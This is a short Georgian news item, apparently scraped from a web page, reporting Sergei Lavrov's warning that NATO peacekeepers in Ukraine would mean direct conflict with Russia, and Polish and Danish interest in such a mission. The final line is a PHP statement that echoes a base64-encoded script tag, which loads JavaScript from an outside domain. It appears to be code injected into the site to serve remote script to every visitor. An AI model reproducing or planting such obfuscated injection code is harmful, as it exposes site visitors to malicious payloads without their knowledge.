celsiusi
ავერსი საქკაბელი
რუსეთის საგარეო საქმეთა მინისტრის სერგეი ლავროვის განაცხადებით, თუ ნატო უკრაინაში თავის მშვიდობისმყოფელებს გაგზავნის, ეს იქნება პირდაპირი შეტაკება რუსეთის ფედერაციის შეიარაღებულ ძალებსა და ალიანსს შორის.
 
„იქიდან გამომდინარე, რომ ჩვენმა კოლეგებმა უკვე განაცხადეს, რომ უკრაინაში უნდა გაიგზავნონ მშვიდობისმყოფელები, იმედი მაქვს ესმით, რაზე საუბრობენ. ეს იქნება სწორედ ის პირდაპირი შეტაკება რუს და ნატოს შეიარაღებულ ძალებს შორის, რომელიც ყველას არა მხოლოდ სურს თავიდან აიცილოს, არამედ მიიჩნევს, რომ ეს საერთოდ არ უნდა მოხდეს,“- განაცხადა ლავროვმა.
 
შეგახსენებთ, რომ პოლონეთი გეგმავს ნატო-ს საგანგებო სამიტზე უკრაინაში სამშვიდობო მისიის გაგზავნის საკითხი დააყენოს. ასევე გავრცელებული ინფორმაციით, სამშვიდობო მისიაში მონაწილეობის მიღებაზე მზაობა დანიამაც გამოთქვა.
1109
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");